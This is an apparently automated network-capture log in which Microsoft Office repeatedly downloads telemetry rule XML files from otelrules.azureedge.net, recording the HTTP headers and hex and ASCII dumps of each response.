                                                                                                                                      2024-11-29 22:11:52 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      134192.168.2.44988313.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:52 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:52 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1360
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                      ETag: "0x8DC582BDD74D2EC"
                                                                                                                                      x-ms-request-id: a0e0d5c5-a01e-0084-68de-419ccd000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221152Z-174f7845968frfdmhC1EWRxxbw00000010n0000000006325
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:52 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      135192.168.2.44988813.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:52 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:52 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1391
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                      ETag: "0x8DC582BDF58DC7E"
                                                                                                                                      x-ms-request-id: 6de228a0-301e-0052-2e05-4165d6000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221152Z-174f7845968vqt9xhC1EWRgten00000010q00000000012ca
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:53 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      136192.168.2.44988913.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:53 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:53 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:53 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1354
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                      ETag: "0x8DC582BE0662D7C"
                                                                                                                                      x-ms-request-id: bc455531-901e-0064-7a1b-41e8a6000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221153Z-174f7845968j6t2phC1EWRcfe800000010p000000000e63t
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:53 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      137192.168.2.44989013.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:53 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:54 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1403
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                      ETag: "0x8DC582BDCDD6400"
                                                                                                                                      x-ms-request-id: 069fcaeb-401e-0016-5ff7-4153e0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221154Z-174f7845968vqt9xhC1EWRgten00000010ng0000000053qk
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:54 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      138192.168.2.44989213.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:54 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:54 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1399
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                      ETag: "0x8DC582BE8C605FF"
                                                                                                                                      x-ms-request-id: 069be9ae-401e-0016-24f6-4153e0000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221154Z-174f78459684bddphC1EWRbht4000000108g00000000ah4z
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:54 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      139192.168.2.44989113.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:54 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:54 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:54 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1366
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                      ETag: "0x8DC582BDF1E2608"
                                                                                                                                      x-ms-request-id: 75b435a0-401e-0048-0433-400409000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221154Z-174f78459685m244hC1EWRgp2c00000010d00000000077ps
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:54 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      140192.168.2.44989313.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:55 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:55 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1362
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                      ETag: "0x8DC582BDF497570"
                                                                                                                                      x-ms-request-id: 581105fc-301e-0000-6a91-3feecc000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221155Z-174f7845968kvnqxhC1EWRmf3g0000000me0000000001grr
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:55 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      141192.168.2.44989413.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:55 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:55 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:55 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1403
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                      ETag: "0x8DC582BDC2EEE03"
                                                                                                                                      x-ms-request-id: 17f40f6b-801e-00a3-7e91-3f7cfb000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221155Z-174f7845968kvnqxhC1EWRmf3g0000000ma000000000d4rb
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:55 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      142192.168.2.44989513.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:56 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:56 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1366
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                      ETag: "0x8DC582BEA414B16"
                                                                                                                                      x-ms-request-id: 629a3d73-e01e-0052-0991-3fd9df000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221156Z-174f7845968xr5c2hC1EWRd0hn0000000he00000000059df
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                      2024-11-29 22:11:56 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                      143192.168.2.44989613.107.246.63443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:11:56 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                      2024-11-29 22:11:56 UTC494INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:11:56 GMT
                                                                                                                                      Content-Type: text/xml
                                                                                                                                      Content-Length: 1399
                                                                                                                                      Connection: close
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                      ETag: "0x8DC582BE1CC18CD"
                                                                                                                                      x-ms-request-id: 9f43eb8e-e01e-003c-5891-3fc70b000000
                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                      x-azure-ref: 20241129T221156Z-174f78459685m244hC1EWRgp2c00000010eg0000000036wx
                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                      Accept-Ranges: bytes
